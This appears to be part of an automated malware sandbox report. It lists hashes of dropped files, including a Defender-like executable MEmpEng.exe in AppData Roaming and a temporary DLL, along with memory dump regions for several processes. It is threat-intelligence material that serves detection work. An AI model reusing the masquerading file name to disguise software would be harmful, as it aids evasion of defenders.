MD5 cf0eba045c28eb2b4994be1e324e1216
SHA1 114167922a85316b65a9c8f2d5d96557186173cd
SHA256 bcb4caa01bedbe917faf95e2b9a929ac35ad4721beae9f952cba3e1bfaa7f04f
SHA512 0abafc0c13c77ca238a9fe1f4886c8ef9d02861aad3d08e3841e2134a00c403613a97822d4dbdf0ce1b179eac433d8aa990757947b075e4bbaffeda64ad7d8fa

C:\Users\Admin\AppData\Local\Temp\RESB4B0.tmp

MD5 3a7593cdda984754158e8af5d4c671c8
SHA1 81b0bee00b076c315415dec30a534011c85aaef5
SHA256 d5c9150e9d34895f9fa45514f0df0c3d7c22dba29ff3a2596713ca29023f217b
SHA512 2c7befee6bbada94e74c16b5ca962df59a9d5445583f6b75e930384ebe61e4173fbf1bceedae5bf80ca8decfe2b15104ba55fdb18bfb4ea76020f68e6be40d5a

C:\Users\Admin\AppData\Local\Temp\nkx7xczb.dll

MD5 df5477c845671846e563304193ec863d
SHA1 12f88c2e596aec3645e3f489d5d882970a399615
SHA256 c9ca950f2ab7a7e366d4f162c2cc41bc1c3613eb2c2b2ea5f604ac999f1aa00f
SHA512 c394689eb3996f10c7aa71180f53a8c7aba38e1116ba0b6fdcf00a0f7c2b98b3e77c1909e47e842c2a3c53bc8bc484254635b6a906fdd120c50f281c8acb9aac

C:\Users\Admin\AppData\Local\Temp\nkx7xczb.pdb

MD5 b50c297c51805c240ef0a12df98e881b
SHA1 6fbf3bf3b6af9940305028d16bf1f2095f699f0e
SHA256 adeaec9bd22a2be62463ab00a2f00f110244932872c48be060eeaa8f0b8d9ef2
SHA512 74391521d0681918955015102951ae185d312e2fa752998a7601f406c67f82fde8081e58a12b2acb1a236c35d8fdc36392a20881217571a508508ed8180fece5

memory/2640-58-0x000000007234D000-0x0000000072358000-memory.dmp

C:\Users\Admin\AppData\Roaming\MEmpEng.exe

MD5 dd2e0becfb1316c49975386fc3367c45
SHA1 98c578ff997ef781919ca5967251fa9d462a756e
SHA256 14d4d6df33e96af2a1d5ef8f8e7f6f1b914b0342b219c75f812848f52bc27628
SHA512 4768fa7aa32dc02e958c8506880311bb0d4fa5a9cd9fcdc6581a8349b1d85b3323513d28018b55ffbdb79e440e4b371dfb260cbd097ffd2279993b9a1a416bfb

memory/1880-65-0x0000000000810000-0x00000000008AC000-memory.dmp

memory/1880-66-0x00000000004D0000-0x00000000004E8000-memory.dmp

memory/1880-67-0x0000000002180000-0x00000000021F6000-memory.dmp

memory/572-73-0x0000000000400000-0x000000000042F000-memory.dmp

memory/572-72-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/572-71-0x0000000000400000-0x000000000042F000-memory.dmp

memory/572-68-0x0000000000400000-0x000000000042F000-memory.dmp

memory/1212-76-0x0000000003180000-0x0000000003280000-memory.dmp

memory/572-77-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2024-79-0x0000000000740000-0x0000000000746000-memory.dmp

memory/2024-80-0x0000000000080000-0x00000000000AF000-memory.dmp

memory/1212-86-0x0000000006880000-0x0000000006923000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F06C5DE6.emf

MD5 8a188a6917ad1fa0c7f1aa20a63c8593
SHA1 4d2270d647d4a3680b47e85501c7ab1442ddcbb2
SHA256 728a3d9b1bee7cd8baa90aa0b1a4805a93238c8f835ea685931ac676ba7ef3e3
SHA512 823246cac3d8a45980ce0623c485fb0b74ce7aa68cca37b22fef1924685f1201298163c398688057736ec4551999b5455db1c97abc7da97e5a07589cd4fd7cdf

memory/2640-91-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2640-94-0x000000007234D000-0x0000000072358000-memory.dmp